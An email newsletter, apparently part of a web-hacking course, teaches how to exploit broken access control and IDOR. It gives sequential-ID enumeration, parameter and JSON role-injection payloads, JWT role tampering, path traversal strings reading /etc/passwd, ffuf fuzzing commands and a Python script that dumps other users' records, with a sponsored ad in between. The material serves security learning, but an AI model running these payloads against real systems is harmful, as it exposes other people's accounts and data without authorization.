In partnership with

🎯 Week 3: Access Control & IDOR

Break the Web: Part 3 of 8

Welcome back to Offensive Tuesday.

Hey 👋

Last week you broke authentication. You brute-forced passwords, hijacked sessions, and cracked JWT tokens. If you missed it, catch up here 👉 week 1 , week 2

This week? We're exploiting access control.

Here's the thing — just because you're logged in doesn't mean you should see everything. But most apps? They forget to check.

You change one number in a URL. Boom — you're viewing someone else's data.

You modify an API request. Suddenly you're an admin.

This is IDOR (Insecure Direct Object Reference) and broken access control — the #1 vulnerability on the OWASP Top 10.

Today you're learning how to exploit it.

Let's break some authorization. 🔓

⚡Starting a business in 2026? Use AI + real people to sell more.

The Future of Shopping? AI + Actual Humans.

AI has changed how consumers shop by speeding up research. But one thing hasn’t changed: shoppers still trust people more than AI.

Levanta’s new Affiliate 3.0 Consumer Report reveals a major shift in how shoppers blend AI tools with human influence. Consumers use AI to explore options, but when it comes time to buy, they still turn to creators, communities, and real experiences to validate their decisions.

The data shows:

• Only 10% of shoppers buy through AI-recommended links

• 87% discover products through creators, blogs, or communities they trust

• Human sources like reviews and creators rank higher in trust than AI recommendations

The most effective brands are combining AI discovery with authentic human influence to drive measurable conversions.

Affiliate marketing isn’t being replaced by AI, it’s being amplified by it.

Download the full report to see what this means for your brand.

🧠 What is Access Control?

Access control decides what you can do after you log in.

Think of it like this:

• Authentication = proving who you are (last week)

• Authorization = what you're allowed to access (this week)

Three types:

1. Horizontal — Users at the same level (user A can't access user B's data)

2. Vertical — Different privilege levels (regular user can't access admin panel)

3. Context-dependent — Based on state or workflow (can't edit after approval)

Your goal: access stuff you shouldn't.

🔓 What is IDOR?

Insecure Direct Object Reference = when an app exposes a direct reference to internal objects (like IDs) without checking if you're allowed to access them.

Example:

https://bank.com/account?id=1234

You're user 1234. What happens if you change it to id=1235?

If the app doesn't check permissions → you just accessed someone else's account.

That's IDOR.

🔧 The Attack Process

Step 1: Map Your Own Resources

First, understand what YOU have access to as a legitimate user.

Open the app and note down:

• Your profile URL

• Your documents/files

• Your API endpoints

• Your account settings

Example endpoints:

GET /api/user/profile?id=42
GET /api/orders/12345
GET /files/document/789
DELETE /api/user/42

Take screenshots, save requests in Burp Suite.

Step 2: Identify Object References

Look for predictable identifiers:

✅ Sequential numbers: id=1, id=2, id=3
✅ UUIDs: 550e8400-e29b-41d4-a716-446655440000
✅ Usernames: user=john, user=admin
✅ Emails: [email protected]
✅ Encoded values: Base64, hex, etc.

Where to find them:

• URLs (/profile?user_id=123)

• POST body parameters

• JSON API responses

• Cookies

• Hidden form fields

Using Burp Suite:

1. Turn on Proxy intercept

2. Browse the app normally

3. Watch for ID parameters in HTTP History

4. Right-click → Send to Repeater (Ctrl+R)

Step 3: Test Horizontal Access Control

Goal: Access another user's data at your privilege level.

Attack #1: Sequential ID Manipulation

Your profile:

GET /api/user/profile?id=1042

Try:

GET /api/user/profile?id=1043
GET /api/user/profile?id=1041
GET /api/user/profile?id=1000

Look for different data in responses.

Attack #2: Parameter Pollution

Add extra parameters:

GET /api/user/profile?id=1042&id=1000
GET /api/user/profile?id=1042&user_id=admin

Attack #3: HTTP Method Tampering

If GET is protected, try others:

POST /api/user/1042
PUT /api/user/1042
DELETE /api/user/1042
PATCH /api/user/1042

Attack #4: JSON Parameter Injection

Original request:

POST /api/updateProfile
{
  "user_id": 1042,
  "email": "[email protected]"
}

Try adding admin fields:

{
  "user_id": 1042,
  "email": "[email protected]",
  "role": "admin",
  "is_admin": true
}

Step 4: Test Vertical Access Control

Goal: Escalate from regular user to admin.

Attack #1: Direct URL Access

Try common admin paths:

/admin
/administrator
/admin.php
/admin/dashboard
/api/admin/users
/panel
/control

Use ffuf to discover hidden admin endpoints:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://target.com/FUZZ -fc 404

Get SecLists here.

Attack #2: Role Parameter Manipulation

Intercept your requests and add:

role=admin
isAdmin=true
admin=1
privilege=admin
user_type=administrator

Attack #3: Cookie/JWT Manipulation

Check your JWT payload:

{
  "user": "john",
  "role": "user",
  "admin": false
}

Change to:

{
  "user": "john",
  "role": "admin",
  "admin": true
}

Re-encode and replace token.

Attack #4: Referer Header Bypass

Some apps only check if you came from an admin page.

Add this header:

Referer: https://target.com/admin/dashboard

Step 5: Test Path Traversal in IDs

Sometimes IDs reference files or paths.

GET /download?file=invoice_1042.pdf

Try:

GET /download?file=../../../etc/passwd
GET /download?file=invoice_1043.pdf
GET /download?file=../../admin/secrets.txt

Step 6: Automate IDOR Testing

Using Burp Suite Intruder:

1. Capture request with ID parameter

2. Send to Intruder (Ctrl+I)

3. Mark the ID value: id=§1042§

4. Set payload type to "Numbers" (1-10000)

5. Start attack

6. Filter by response length or status code

Using ffuf:

ffuf -w ids.txt -u https://target.com/api/user/FUZZ -H "Cookie: session=YOUR_SESSION"

Create ids.txt:

1
2
3
...
10000

Using Python script:

import requests

session = "your_session_cookie_here"
headers = {"Cookie": f"session={session}"}

for user_id in range(1, 1000):
    r = requests.get(f"https://target.com/api/user/{user_id}", headers=headers)
    if r.status_code == 200:
        print(f"[+] Found: User {user_id}")
        print(r.json())

Step 7: Test Mass Assignment

What is it? When an app binds all incoming parameters to internal objects without filtering.

Example vulnerable code:

user.update(request.POST)  # Dangerous!

Attack:

Original request:

POST /api/register
{
  "username": "newuser",
  "email": "[email protected]",
  "password": "pass123"
}

Try adding:

{
  "username": "newuser",
  "email": "[email protected]",
  "password": "pass123",
  "role": "admin",
  "is_verified": true,
  "credits": 999999

Step 8: Test Function-Level Access Control

Can you call admin functions as a regular user?

Example endpoints:

POST /api/deleteUser
POST /api/promoteUser
POST /api/resetPassword
GET /api/getAllUsers

Test them with your regular session token.

Using curl:

curl -X POST https://target.com/api/deleteUser \
  -H "Cookie: session=YOUR_SESSION" \
  -H "Content-Type: application/json" \
  -d '{"user_id": 1000}'

Step 9: Test for UUID/GUID Weaknesses

UUIDs look secure but aren't always:

550e8400-e29b-41d4-a716-446655440000

Attacks:

1. Sequential UUIDs — Some systems generate predictable UUIDs

2. Version 1 UUIDs — Contain timestamp + MAC address (can be enumerated)

3. Information Leakage — Sometimes exposed in other endpoints

Try:

• Increment/decrement hex values

• Check if UUIDs are exposed in public endpoints

• Use uuid-tools to analyze UUID versions

🛠️ Tool List

IDOR Testing:

• Burp Suite — Download here (Intruder for automation)

• OWASP ZAP — Download here

• Autorize (Burp extension) — Get it here

• AutoRepeater (Burp extension) — Get it here

Fuzzing & Discovery:

• ffuf — Install guide

• wfuzz — Install guide

• SecLists — Download wordlists

JWT Tools:

• jwt_tool — Get it here

• jwt.io — Use online decoder

Scripting:

• Python requests — Documentation

• Postman — Download here

📚 Learning Resources

Reading:

• OWASP Top 10: Broken Access Control — Read here

• HackerOne IDOR Reports — Browse reports

• Bugcrowd IDOR Write-ups — Read write-ups

• PortSwigger Access Control Guide — Complete guide

That's Week 3. 🔥

Tomorrow (Wednesday): How to build proper access control and defend against IDOR.

Next Tuesday: Injection Attacks — we're breaking SQL and command injection wide open.

See you then.

— Zwire✌️

P.S. Got questions? Reply to this email. I read everything.